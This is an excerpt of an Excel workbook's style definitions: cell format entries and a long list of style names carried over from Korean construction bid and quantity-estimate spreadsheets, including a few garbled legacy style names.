    <xf numFmtId="0" fontId="58" fillId="0" borderId="24">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="3" fontId="52" fillId="0" borderId="25">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="190" fontId="46" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="194" fontId="46" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="57" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="224" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="71" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="22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0" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf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37" fontId="72" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="224" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf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37" fontId="72" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="224" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="41" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="224" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="46" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="73" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="37" fontId="7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73" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="37" fontId="72" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="224" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="22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6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224" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="74" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="42" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="225" fontId="0" fillId="0" borderId="0" applyFill="0" applyBorder="0" applyAlignment="0">
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="75" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="224" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="40" fontId="41" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="4" fontId="58" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="41" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="196" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="185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78" fillId="0" borderId="0" applyNumberFormat="0" applyAlignment="0">
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="47" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="199" fontId="58" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0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95" fontId="45" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="195" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="200" fontId="58" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf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6" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="79" fillId="0" borderId="0" applyNumberFormat="0" applyAlignment="0">
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="58" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="58" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="80" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="58" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="58" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="58" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="80" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="201" fontId="58" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="81" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="38" fontId="82" fillId="22" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="3" fontId="44" fillId="0" borderId="10">
      <alignment horizontal="right" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="4" fontId="44" fillId="0" borderId="10">
      <alignment horizontal="right" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="83" fillId="0" borderId="0">
      <alignment horizontal="left"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="43" fillId="0" borderId="26" applyNumberFormat="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="43" fillId="0" borderId="27">
      <alignment horizontal="left" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="8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2" fontId="55" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="202" fontId="55" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="85" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="10" fontId="82" fillId="22" borderId="1" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="203" fontId="44" fillId="0" borderId="1">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="86" fillId="0" borderId="28" applyFont="0" applyBorder="0" applyAlignment="0">
      <protection/>
    </xf>
    <xf numFmtId="204" fontId="44" fillId="0" borderId="1">
      <alignment horizontal="right" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="205" fontId="44" fillId="0" borderId="1">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="206" fontId="44" fillId="0" borderId="1">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="184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0" fontId="87" fillId="0" borderId="29">
      <alignment/>
      <protection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37" fontId="88" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="207" fontId="47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40" fillId="0" borderId="0">
      <alignment/>
      <protection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>
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="185" fontId="19" fillId="0" borderId="0">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="208" fontId="58" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="10" fontId="40" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="202" fontId="90" fillId="0" borderId="0">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="30" fontId="91" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="178" fontId="19" fillId="0" borderId="0">
      <alignment horizontal="right" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="178" fontId="19" fillId="0" borderId="0">
      <alignment vertical="distributed"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="40" fillId="25" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="87" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="40" fontId="93" fillId="0" borderId="0" applyBorder="0">
      <alignment horizontal="right"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="94" fillId="0" borderId="0" applyFill="0" applyBorder="0" applyProtection="0">
      <alignment horizontal="centerContinuous" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="53" fillId="22" borderId="0" applyFill="0" applyBorder="0" applyProtection="0">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="202" fontId="58" fillId="0" borderId="30">
      <alignment/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="95" fillId="0" borderId="31">
      <alignment horizontal="left"/>
      <protection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32" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="33" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="3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1" fontId="17" fillId="0" borderId="4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1" fontId="17" fillId="0" borderId="8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41" fontId="17" fillId="0" borderId="4" xfId="1361" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="41" fontId="17" fillId="0" borderId="8" xfId="1361" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="41" fontId="1" fillId="0" borderId="35" xfId="136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77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7" fillId="0" borderId="39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4" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="4" borderId="0" xfId="1633" applyFont="1" applyFill="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="40" fillId="0" borderId="0" xfId="1633">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="40" fillId="4" borderId="0" xfId="1633" applyFill="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="40" fillId="23" borderId="40" xfId="1633" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="40" fillId="26" borderId="13" xfId="1633" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="97" fillId="27" borderId="41" xfId="1633" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="98" fillId="28" borderId="42" xfId="1633" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="97" fillId="27" borderId="42" xfId="1633" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="97" fillId="27" borderId="43" xfId="1633" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="40" fillId="26" borderId="14" xfId="1633" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="40" fillId="23" borderId="44" xfId="1633" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="40" fillId="26" borderId="44" xfId="1633" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="40" fillId="23" borderId="45" xfId="1633" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="41" fontId="99" fillId="0" borderId="0" xfId="1361" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="9" fontId="99" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="41" fontId="99" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="41" fontId="17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top"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="49" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="50" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="51" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="179" fontId="14" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="46" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="47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1635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top"/>
    </xf>
  </cellXfs>
  <cellStyles count="1886">
    <cellStyle name="Normal" xfId="0"/>
    <cellStyle name="RowLevel_0" xfId="1"/>
    <cellStyle name="ColLevel_0" xfId="2"/>
    <cellStyle name="RowLevel_1" xfId="3"/>
    <cellStyle name="ColLevel_1" xfId="4"/>
    <cellStyle name="          &#13;&#10;386grabber=vga.3gr&#13;&#10;" xfId="15"/>
    <cellStyle name="#,##0" xfId="16"/>
    <cellStyle name="$" xfId="17"/>
    <cellStyle name="$_견적2" xfId="18"/>
    <cellStyle name="$_기아" xfId="19"/>
    <cellStyle name="$_db진흥" xfId="20"/>
    <cellStyle name="$_SE40" xfId="21"/>
    <cellStyle name="??&amp;O?&amp;H?_x0008__x000F__x0007_?_x0007__x0001__x0001_" xfId="22"/>
    <cellStyle name="??&amp;O?&amp;H?_x0008_??_x0007__x0001__x0001_" xfId="23"/>
    <cellStyle name="?W?_laroux" xfId="24"/>
    <cellStyle name="_9월" xfId="25"/>
    <cellStyle name="_광주평동투찰" xfId="26"/>
    <cellStyle name="_광주평동투찰_수량산출서" xfId="27"/>
    <cellStyle name="_광주평동투찰_수량산출서_관악구청(수정완료)" xfId="28"/>
    <cellStyle name="_광주평동투찰_수량산출서_중구(담당자요청대로)" xfId="29"/>
    <cellStyle name="_광주평동투찰_수량산출서_중구청일위대가(0318)" xfId="30"/>
    <cellStyle name="_광주평동투찰_중구청일위대가" xfId="31"/>
    <cellStyle name="_광주평동투찰_중구청일위대가_관악구청(수정완료)" xfId="32"/>
    <cellStyle name="_광주평동투찰_중구청일위대가_중구(담당자요청대로)" xfId="33"/>
    <cellStyle name="_광주평동투찰_중구청일위대가_중구청일위대가(0318)" xfId="34"/>
    <cellStyle name="_광주평동투찰3" xfId="35"/>
    <cellStyle name="_광주평동투찰3_수량산출서" xfId="36"/>
    <cellStyle name="_광주평동투찰3_수량산출서_관악구청(수정완료)" xfId="37"/>
    <cellStyle name="_광주평동투찰3_수량산출서_중구(담당자요청대로)" xfId="38"/>
    <cellStyle name="_광주평동투찰3_수량산출서_중구청일위대가(0318)" xfId="39"/>
    <cellStyle name="_광주평동투찰3_중구청일위대가" xfId="40"/>
    <cellStyle name="_광주평동투찰3_중구청일위대가_관악구청(수정완료)" xfId="41"/>
    <cellStyle name="_광주평동투찰3_중구청일위대가_중구(담당자요청대로)" xfId="42"/>
    <cellStyle name="_광주평동투찰3_중구청일위대가_중구청일위대가(0318)" xfId="43"/>
    <cellStyle name="_광주평동품의1" xfId="44"/>
    <cellStyle name="_광주평동품의1_수량산출서" xfId="45"/>
    <cellStyle name="_광주평동품의1_수량산출서_관악구청(수정완료)" xfId="46"/>
    <cellStyle name="_광주평동품의1_수량산출서_중구(담당자요청대로)" xfId="47"/>
    <cellStyle name="_광주평동품의1_수량산출서_중구청일위대가(0318)" xfId="48"/>
    <cellStyle name="_광주평동품의1_중구청일위대가" xfId="49"/>
    <cellStyle name="_광주평동품의1_중구청일위대가_관악구청(수정완료)" xfId="50"/>
    <cellStyle name="_광주평동품의1_중구청일위대가_중구(담당자요청대로)" xfId="51"/>
    <cellStyle name="_광주평동품의1_중구청일위대가_중구청일위대가(0318)" xfId="52"/>
    <cellStyle name="_국도23호선영암연소지구내역서" xfId="53"/>
    <cellStyle name="_국도38호선통리지구내역서" xfId="54"/>
    <cellStyle name="_국도42호선여량지구오르막차로" xfId="55"/>
    <cellStyle name="_금천청소년수련관(토목林)" xfId="56"/>
    <cellStyle name="_도고천품의안11" xfId="57"/>
    <cellStyle name="_도고천품의안11_1" xfId="58"/>
    <cellStyle name="_도고천품의안11_1_수량산출서" xfId="59"/>
    <cellStyle name="_도고천품의안11_1_수량산출서_관악구청(수정완료)" xfId="60"/>
    <cellStyle name="_도고천품의안11_1_수량산출서_중구(담당자요청대로)" xfId="61"/>
    <cellStyle name="_도고천품의안11_1_수량산출서_중구청일위대가(0318)" xfId="62"/>
    <cellStyle name="_도고천품의안11_1_중구청일위대가" xfId="63"/>
    <cellStyle name="_도고천품의안11_1_중구청일위대가_관악구청(수정완료)" xfId="64"/>
    <cellStyle name="_도고천품의안11_1_중구청일위대가_중구(담당자요청대로)" xfId="65"/>
    <cellStyle name="_도고천품의안11_1_중구청일위대가_중구청일위대가(0318)" xfId="66"/>
    <cellStyle name="_도고천품의안11_광주평동투찰" xfId="67"/>
    <cellStyle name="_도고천품의안11_광주평동투찰_수량산출서" xfId="68"/>
    <cellStyle name="_도고천품의안11_광주평동투찰_수량산출서_관악구청(수정완료)" xfId="69"/>
    <cellStyle name="_도고천품의안11_광주평동투찰_수량산출서_중구(담당자요청대로)" xfId="70"/>
    <cellStyle name="_도고천품의안11_광주평동투찰_수량산출서_중구청일위대가(0318)" xfId="71"/>
    <cellStyle name="_도고천품의안11_광주평동투찰_중구청일위대가" xfId="72"/>
    <cellStyle name="_도고천품의안11_광주평동투찰_중구청일위대가_관악구청(수정완료)" xfId="73"/>
    <cellStyle name="_도고천품의안11_광주평동투찰_중구청일위대가_중구(담당자요청대로)" xfId="74"/>
    <cellStyle name="_도고천품의안11_광주평동투찰_중구청일위대가_중구청일위대가(0318)" xfId="75"/>
    <cellStyle name="_도고천품의안11_광주평동품의1" xfId="76"/>
    <cellStyle name="_도고천품의안11_광주평동품의1_수량산출서" xfId="77"/>
    <cellStyle name="_도고천품의안11_광주평동품의1_수량산출서_관악구청(수정완료)" xfId="78"/>
    <cellStyle name="_도고천품의안11_광주평동품의1_수량산출서_중구(담당자요청대로)" xfId="79"/>
    <cellStyle name="_도고천품의안11_광주평동품의1_수량산출서_중구청일위대가(0318)" xfId="80"/>
    <cellStyle name="_도고천품의안11_광주평동품의1_중구청일위대가" xfId="81"/>
    <cellStyle name="_도고천품의안11_광주평동품의1_중구청일위대가_관악구청(수정완료)" xfId="82"/>
    <cellStyle name="_도고천품의안11_광주평동품의1_중구청일위대가_중구(담당자요청대로)" xfId="83"/>
    <cellStyle name="_도고천품의안11_광주평동품의1_중구청일위대가_중구청일위대가(0318)" xfId="84"/>
    <cellStyle name="_도고천품의안11_송학하수품의(설계넣고)" xfId="85"/>
    <cellStyle name="_도고천품의안11_송학하수품의(설계넣고)_수량산출서" xfId="86"/>
    <cellStyle name="_도고천품의안11_송학하수품의(설계넣고)_수량산출서_관악구청(수정완료)" xfId="87"/>
    <cellStyle name="_도고천품의안11_송학하수품의(설계넣고)_수량산출서_중구(담당자요청대로)" xfId="88"/>
    <cellStyle name="_도고천품의안11_송학하수품의(설계넣고)_수량산출서_중구청일위대가(0318)" xfId="89"/>
    <cellStyle name="_도고천품의안11_송학하수품의(설계넣고)_중구청일위대가" xfId="90"/>
    <cellStyle name="_도고천품의안11_송학하수품의(설계넣고)_중구청일위대가_관악구청(수정완료)" xfId="91"/>
    <cellStyle name="_도고천품의안11_송학하수품의(설계넣고)_중구청일위대가_중구(담당자요청대로)" xfId="92"/>
    <cellStyle name="_도고천품의안11_송학하수품의(설계넣고)_중구청일위대가_중구청일위대가(0318)" xfId="93"/>
    <cellStyle name="_도고천품의안11_수량산출서" xfId="94"/>
    <cellStyle name="_도고천품의안11_수량산출서_관악구청(수정완료)" xfId="95"/>
    <cellStyle name="_도고천품의안11_수량산출서_중구(담당자요청대로)" xfId="96"/>
    <cellStyle name="_도고천품의안11_수량산출서_중구청일위대가(0318)" xfId="97"/>
    <cellStyle name="_도고천품의안11_중구청일위대가" xfId="98"/>
    <cellStyle name="_도고천품의안11_중구청일위대가_관악구청(수정완료)" xfId="99"/>
    <cellStyle name="_도고천품의안11_중구청일위대가_중구(담당자요청대로)" xfId="100"/>
    <cellStyle name="_도고천품의안11_중구청일위대가_중구청일위대가(0318)" xfId="101"/>
    <cellStyle name="_두계변전소하도급" xfId="102"/>
    <cellStyle name="_매정견적보고" xfId="103"/>
    <cellStyle name="_명암지도로투찰2" xfId="104"/>
    <cellStyle name="_명암지도로투찰2_수량산출서" xfId="105"/>
    <cellStyle name="_명암지도로투찰2_수량산출서_관악구청(수정완료)" xfId="106"/>
    <cellStyle name="_명암지도로투찰2_수량산출서_중구(담당자요청대로)" xfId="107"/>
    <cellStyle name="_명암지도로투찰2_수량산출서_중구청일위대가(0318)" xfId="108"/>
    <cellStyle name="_명암지도로투찰2_중구청일위대가" xfId="109"/>
    <cellStyle name="_명암지도로투찰2_중구청일위대가_관악구청(수정완료)" xfId="110"/>
    <cellStyle name="_명암지도로투찰2_중구청일위대가_중구(담당자요청대로)" xfId="111"/>
    <cellStyle name="_명암지도로투찰2_중구청일위대가_중구청일위대가(0318)" xfId="112"/>
    <cellStyle name="_부대입찰확약서" xfId="113"/>
    <cellStyle name="_사동초중" xfId="114"/>
    <cellStyle name="_설계추정2(토목)대림" xfId="115"/>
    <cellStyle name="_송학하수품의(설계넣고)" xfId="116"/>
    <cellStyle name="_송학하수품의(설계넣고)_수량산출서" xfId="117"/>
    <cellStyle name="_송학하수품의(설계넣고)_수량산출서_관악구청(수정완료)" xfId="118"/>
    <cellStyle name="_송학하수품의(설계넣고)_수량산출서_중구(담당자요청대로)" xfId="119"/>
    <cellStyle name="_송학하수품의(설계넣고)_수량산출서_중구청일위대가(0318)" xfId="120"/>
    <cellStyle name="_송학하수품의(설계넣고)_중구청일위대가" xfId="121"/>
    <cellStyle name="_송학하수품의(설계넣고)_중구청일위대가_관악구청(수정완료)" xfId="122"/>
    <cellStyle name="_송학하수품의(설계넣고)_중구청일위대가_중구(담당자요청대로)" xfId="123"/>
    <cellStyle name="_송학하수품의(설계넣고)_중구청일위대가_중구청일위대가(0318)" xfId="124"/>
    <cellStyle name="_양양상수도공내역서" xfId="125"/>
    <cellStyle name="_우" xfId="126"/>
    <cellStyle name="_우_광주평동투찰" xfId="127"/>
    <cellStyle name="_우_광주평동투찰_수량산출서" xfId="128"/>
    <cellStyle name="_우_광주평동투찰_수량산출서_관악구청(수정완료)" xfId="129"/>
    <cellStyle name="_우_광주평동투찰_수량산출서_중구(담당자요청대로)" xfId="130"/>
    <cellStyle name="_우_광주평동투찰_수량산출서_중구청일위대가(0318)" xfId="131"/>
    <cellStyle name="_우_광주평동투찰_중구청일위대가" xfId="132"/>
    <cellStyle name="_우_광주평동투찰_중구청일위대가_관악구청(수정완료)" xfId="133"/>
    <cellStyle name="_우_광주평동투찰_중구청일위대가_중구(담당자요청대로)" xfId="134"/>
    <cellStyle name="_우_광주평동투찰_중구청일위대가_중구청일위대가(0318)" xfId="135"/>
    <cellStyle name="_우_광주평동품의1" xfId="136"/>
    <cellStyle name="_우_광주평동품의1_수량산출서" xfId="137"/>
    <cellStyle name="_우_광주평동품의1_수량산출서_관악구청(수정완료)" xfId="138"/>
    <cellStyle name="_우_광주평동품의1_수량산출서_중구(담당자요청대로)" xfId="139"/>
    <cellStyle name="_우_광주평동품의1_수량산출서_중구청일위대가(0318)" xfId="140"/>
    <cellStyle name="_우_광주평동품의1_중구청일위대가" xfId="141"/>
    <cellStyle name="_우_광주평동품의1_중구청일위대가_관악구청(수정완료)" xfId="142"/>
    <cellStyle name="_우_광주평동품의1_중구청일위대가_중구(담당자요청대로)" xfId="143"/>
    <cellStyle name="_우_광주평동품의1_중구청일위대가_중구청일위대가(0318)" xfId="144"/>
    <cellStyle name="_우_송학하수품의(설계넣고)" xfId="145"/>
    <cellStyle name="_우_송학하수품의(설계넣고)_수량산출서" xfId="146"/>
    <cellStyle name="_우_송학하수품의(설계넣고)_수량산출서_관악구청(수정완료)" xfId="147"/>
    <cellStyle name="_우_송학하수품의(설계넣고)_수량산출서_중구(담당자요청대로)" xfId="148"/>
    <cellStyle name="_우_송학하수품의(설계넣고)_수량산출서_중구청일위대가(0318)" xfId="149"/>
    <cellStyle name="_우_송학하수품의(설계넣고)_중구청일위대가" xfId="150"/>
    <cellStyle name="_우_송학하수품의(설계넣고)_중구청일위대가_관악구청(수정완료)" xfId="151"/>
    <cellStyle name="_우_송학하수품의(설계넣고)_중구청일위대가_중구(담당자요청대로)" xfId="152"/>
    <cellStyle name="_우_송학하수품의(설계넣고)_중구청일위대가_중구청일위대가(0318)" xfId="153"/>
    <cellStyle name="_우_수량산출서" xfId="154"/>
    <cellStyle name="_우_수량산출서_관악구청(수정완료)" xfId="155"/>
    <cellStyle name="_우_수량산출서_중구(담당자요청대로)" xfId="156"/>
    <cellStyle name="_우_수량산출서_중구청일위대가(0318)" xfId="157"/>
    <cellStyle name="_우_우주센터투찰" xfId="158"/>
    <cellStyle name="_우_우주센터투찰_광주평동투찰" xfId="159"/>
    <cellStyle name="_우_우주센터투찰_광주평동투찰_수량산출서" xfId="160"/>
    <cellStyle name="_우_우주센터투찰_광주평동투찰_수량산출서_관악구청(수정완료)" xfId="161"/>
    <cellStyle name="_우_우주센터투찰_광주평동투찰_수량산출서_중구(담당자요청대로)" xfId="162"/>
    <cellStyle name="_우_우주센터투찰_광주평동투찰_수량산출서_중구청일위대가(0318)" xfId="163"/>
    <cellStyle name="_우_우주센터투찰_광주평동투찰_중구청일위대가" xfId="164"/>
    <cellStyle name="_우_우주센터투찰_광주평동투찰_중구청일위대가_관악구청(수정완료)" xfId="165"/>
    <cellStyle name="_우_우주센터투찰_광주평동투찰_중구청일위대가_중구(담당자요청대로)" xfId="166"/>
    <cellStyle name="_우_우주센터투찰_광주평동투찰_중구청일위대가_중구청일위대가(0318)" xfId="167"/>
    <cellStyle name="_우_우주센터투찰_광주평동품의1" xfId="168"/>
    <cellStyle name="_우_우주센터투찰_광주평동품의1_수량산출서" xfId="169"/>
    <cellStyle name="_우_우주센터투찰_광주평동품의1_수량산출서_관악구청(수정완료)" xfId="170"/>
    <cellStyle name="_우_우주센터투찰_광주평동품의1_수량산출서_중구(담당자요청대로)" xfId="171"/>
    <cellStyle name="_우_우주센터투찰_광주평동품의1_수량산출서_중구청일위대가(0318)" xfId="172"/>
    <cellStyle name="_우_우주센터투찰_광주평동품의1_중구청일위대가" xfId="173"/>
    <cellStyle name="_우_우주센터투찰_광주평동품의1_중구청일위대가_관악구청(수정완료)" xfId="174"/>
    <cellStyle name="_우_우주센터투찰_광주평동품의1_중구청일위대가_중구(담당자요청대로)" xfId="175"/>
    <cellStyle name="_우_우주센터투찰_광주평동품의1_중구청일위대가_중구청일위대가(0318)" xfId="176"/>
    <cellStyle name="_우_우주센터투찰_송학하수품의(설계넣고)" xfId="177"/>
    <cellStyle name="_우_우주센터투찰_송학하수품의(설계넣고)_수량산출서" xfId="178"/>
    <cellStyle name="_우_우주센터투찰_송학하수품의(설계넣고)_수량산출서_관악구청(수정완료)" xfId="179"/>
    <cellStyle name="_우_우주센터투찰_송학하수품의(설계넣고)_수량산출서_중구(담당자요청대로)" xfId="180"/>
    <cellStyle name="_우_우주센터투찰_송학하수품의(설계넣고)_수량산출서_중구청일위대가(0318)" xfId="181"/>
    <cellStyle name="_우_우주센터투찰_송학하수품의(설계넣고)_중구청일위대가" xfId="182"/>
    <cellStyle name="_우_우주센터투찰_송학하수품의(설계넣고)_중구청일위대가_관악구청(수정완료)" xfId="183"/>
    <cellStyle name="_우_우주센터투찰_송학하수품의(설계넣고)_중구청일위대가_중구(담당자요청대로)" xfId="184"/>
    <cellStyle name="_우_우주센터투찰_송학하수품의(설계넣고)_중구청일위대가_중구청일위대가(0318)" xfId="185"/>
    <cellStyle name="_우_우주센터투찰_수량산출서" xfId="186"/>
    <cellStyle name="_우_우주센터투찰_수량산출서_관악구청(수정완료)" xfId="187"/>
    <cellStyle name="_우_우주센터투찰_수량산출서_중구(담당자요청대로)" xfId="188"/>
    <cellStyle name="_우_우주센터투찰_수량산출서_중구청일위대가(0318)" xfId="189"/>
